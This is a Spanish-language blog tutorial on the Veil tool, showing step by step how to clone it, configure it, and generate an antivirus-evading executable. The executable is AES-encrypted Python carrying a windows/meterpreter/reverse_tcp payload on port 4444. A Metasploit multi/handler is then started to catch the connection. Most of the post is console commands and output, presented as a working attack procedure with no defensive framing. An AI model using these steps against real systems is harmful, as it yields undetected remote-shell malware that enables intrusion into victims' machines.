Veil – Evasión de Antivirus

10:47 0 Comments A+ a-


Veil es una herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus. Utiliza métodos distintos para generar payloads diferentes y permite al usuario usar Pyinstaller o Py2Exe para convertir los payloads de Python a ejecutables.

Descarga Veil:
git clone https://github.com/ChrisTruncer/Veil
cd Veil
python Veil.py
root@stuxnet:/media/Stuxnet/Pentesting/veil# python Veil.py
 
=========================================================================
 Veil First Run Detected... Initializing Script Setup...
=========================================================================
 
 [*] Executing ./config/update.py...
 [>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf
 [*] OPERATING_SYSTEM = Linux
 [*] TERMINAL_CLEAR = clear
 [*] VEIL_PATH = /media/Stuxnet/Pentesting/veil/
 [*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/
 [*] Path '/root/veil-output/source/' Created
 [*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/
 [*] Path '/ro
ot/veil-output/compiled/' Created
 [*] TEMP_DIR = /tmp/
 [*] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf
 [*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/
 [*] MSFVENOM_OPTIONS =
 [*] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/settings.py
 
=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
 
 [!] WARNING: Official support for Kali Linux (x86) only at this time!
 [!] WARNING: Continue at your own risk!
 
 Main Menu
 
    18 payloads loaded
 
 Available commands:
 
    use             use a specific payload
    update          update Veil to the latest version
    list            list available languages/payloads
    info            information on a specific payload
    exit            exit Veil
 
 [>] Please enter a command: list
 
 
=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
 
 [!] WARNING: Official support for Kali Linux (x86) only at this time!
 [!] WARNING: Continue at your own risk!
 
 Available payloads:
 
    1)  c/VirtualAlloc                  Poor
    2)  c/VoidPointer                   Poor
 
    3)  c#/VirtualAlloc                 Poor
    4)  c#/b64SubVirtualAlloc           Normal
 
    5)  native/BackdoorFactory          Normal
    6)  native/hyperion                 Normal
    7)  native/pescrambler              Normal
 
    8)  powershell/DownloadVirtualAlloc     Excellent
    9)  powershell/PsexecVirtualAlloc       Excellent
    10) powershell/VirtualAlloc         Excellent
 
    11) python/AESEncrypted             Excellent
    12) python/ARCEncrypted             Excellent
    13) python/Base64Encode             Excellent
    14) python/DESEncrypted             Excellent
    15) python/FlatInjection            Normal
    16) python/LetterSubstitution       Excellent
    17) python/MeterHTTPContained       Excellent
    18) python/MeterHTTPSContained      Excellent
 
 [>] Please enter a command: 11
 
=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
 
Payload: python/AESEncrypted loaded
 
 Required Options:
 
 Name           Current Value   Description
 ----           -------------   -----------
 compile_to_exe     Y           Compile to an executable
 inject_method      virtual     [virtual]alloc or [void]pointer
 use_pyherion       N           Use the pyherion encrypter
 
 Available commands:
 
    set             set a specific option value
    info            show information about the payload
    help [crypters] show help menu for payload or crypters
    generate        generate payload
    exit            exit Veil
    back            go to the main menu
 
 [>] Please enter a command: generate
 
=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
 
[?] Use msfvenom or supply custom shellcode?
 
        1 - msfvenom (default)
        2 - Custom
 
 [>] Please enter the number of your choice: 1
 
 [*] Press [enter] for windows/meterpreter/reverse_tcp
 [*] Press [tab] to list available payloads
 [>] Please enter metasploit payload:
 [>] Enter value for 'LHOST', [tab] for local IP: xxx.xxx.xxx.xxx
 [>] Enter value for 'LPORT': 4444
 [>] Enter extra msfvenom options in OPTION=value syntax:
 
 [*] Generating shellcode...
 
=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
 
 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files:
 
 [?] How would you like to create your payload executable?
 
        1 - Pyinstaller (default)
        2 - Py2Exe
 
 [>] Please enter the number of your choice: 1
Seleccionamos la opción 1 y finalizamos. En este momento empieza a salir varios mensajes por consola mientras genera el ejecutable y finalmente, muestra un resumen de todo. En este se puede ver la ruta en la que ha dejado el resultado. Ahora abrimos Metasploit:
msf> use exploit/multi/handler
msf exploit(handler) > exploit